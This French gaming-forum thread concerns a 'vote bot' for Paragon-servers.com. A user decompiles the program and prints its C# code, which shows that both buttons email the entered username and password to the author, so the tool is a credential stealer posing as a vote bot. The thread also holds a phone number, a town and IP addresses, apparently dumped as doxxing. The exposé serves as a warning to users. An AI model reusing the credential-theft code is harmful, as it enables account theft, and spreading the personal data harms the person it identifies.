[Bot Vote] Paragon-servers.com

    Publicités

Users Who Are Viewing This Thread (Total: 0, Members: 0, Guests: 0)

Status
Not open for further replies.

Rkuparagon

Membre Banni
Apr 20, 2013
4
0
201
Suite à de nombreux MP, je re-up mon botvote qui passe les proxy d'entreprise : pour voter partout même au travail

Le programme permet de voter automatiquement toutes les 2 heures sans avoir à aller sur le site web. Faites tout de même attention à ne pas trop voter car les admins contrôlent le nombre de vote possible.

Il marche impeccable : je suis presque toujours dans les 5 premiers du top vote ^^

Un premier lien free : Ce lien n'est pas visible, veuillez vous connecter pour l'afficher. Je m'inscris!

Bon vote à vous : à vous les diamonds ^^
 
Last edited:

jojom

Membre
Feb 4, 2010
25
0
902
marche pas bizarre, essaye de recompiler le prog et de me le réenvoyer

ça me met identifiants incorects
 
Last edited:

Rkuparagon

Membre Banni
Apr 20, 2013
4
0
201
marche pas bizarre, essaye de recompiler le prog et de me le réenvoyer

ça me met identifiants incorects

Après avoir testé, je confirme que le bote avait un problème. J'ai corrigé la version publiée, cela devrait fonctionner correctement.

Il faut télécharger la nouvelle version

voili voilou:désolé:

---------- Message ajouté à 18h24 ---------- Le message précédent était à 14h35 ----------

06 61 67 47 98
clamart france
Ce lien n'est pas visible, veuillez vous connecter pour l'afficher. Je m'inscris!
85.115.60.180
89.92.162.236
 

jojom

Membre
Feb 4, 2010
25
0
902
Après avoir testé, je confirme que le bote avait un problème. J'ai corrigé la version publiée, cela devrait fonctionner correctement.

Il faut télécharger la nouvelle version

voili voilou:désolé:

---------- Message ajouté à 18h24 ---------- Le message précédent était à 14h35 ----------

06 61 67 47 98
clamart france
Ce lien n'est pas visible, veuillez vous connecter pour l'afficher. Je m'inscris!
85.115.60.180
89.92.162.236

marche tjrs pas pour moi
 

Shadow9327

Nouveau membre
Jun 23, 2010
1
0
561
42
Bonjour,

Le programme permet de voter automatiquement toutes les 2 heures sans avoir à aller sur le site web. Faites tout de même attention à ne pas trop voter car les admins contrôlent le nombre de vote possible.

Ou pas j'ai envie de dire !
Comme c'est simple de désassembler un programme codé en .NET (je suis d'un naturel curieux), et c'est fou ce qu'on peut trouver comme belle chose à l'intérieur :

Premièrement c'est un programme windows form tout ce qu'il y a de plus basique et de plus rapidement codé (pas de nom explicite des éléments de l'interface, c'est trop compliqué à changer et puis fuck it, Button1, Button2 c'est bien aussi, Cf image ci dessous).
bSrQgwj.png


De plus vous remarquerez la simplicité de l'architecture de l'application. Juste une bête classe Mail qui semble avoir été codée (ou recopiée). Vous me direz mais à quoi sert une classe Mail - qui, le nom est explicite, sert à envoyer un e mail - dans un programme de vote ?
Je vous laisse quelques minutes de réflexion.
Besoin d'un indice ?
Code:
private void Button2_Click(object sender, EventArgs e)
    {
      new Form1.Mail()
      {
        receiver = "[email protected]",
        subject = ("Username : " + this.TextBox1.Text + " Password :" + this.TextBox2.Text),
        body = "Message"
      }.send();
      this.Button3.Enabled = true;
      this.Button2.Enabled = false;
      int num = (int) Interaction.MsgBox((object) "Le vote automatique a été activé", MsgBoxStyle.OkOnly, (object) "Bot Vote Paragons-servers.com - By Kachyos");
    }

    private void Button1_Click(object sender, EventArgs e)
    {
      new Form1.Mail()
      {
        receiver = "[email protected]",
        subject = ("Username : " + this.TextBox1.Text + " Password :" + this.TextBox2.Text),
        body = "Message"
      }.send();
      int num = (int) Interaction.MsgBox((object) "Vos identifiants sont corrects.", MsgBoxStyle.OkOnly, (object) "Bot Vote Paragons-servers.com - By Kachyos");
    }

Voici ce que font les boutons "Tester les identifiants" (Button1) et "Vote automatique" (Button2). Ces deux boutons récupèrent les identifiants rentrés et les envoient gentiment à l'auteur de ce gentil petit programme.

Ne vous étonnez pas si le bot de vote ne fonctionne pas après cela !

J'espère qu'avec mon poste je vais éveiller l'attention de certaines personnes, ne croyez pas sur parole une personne qui vous offre une solution toute cuite.

Sur ce, Bonne journée et bon jeu à tous !
 

darkryu89

Membre
Feb 10, 2011
11
0
426
jolie bravo keylogger on fake application
xD

---------- Message ajouté à 19h05 ---------- Le message précédent était à 19h04 ----------

jolie bravo keylogger on fake application
xD
 
Status
Not open for further replies.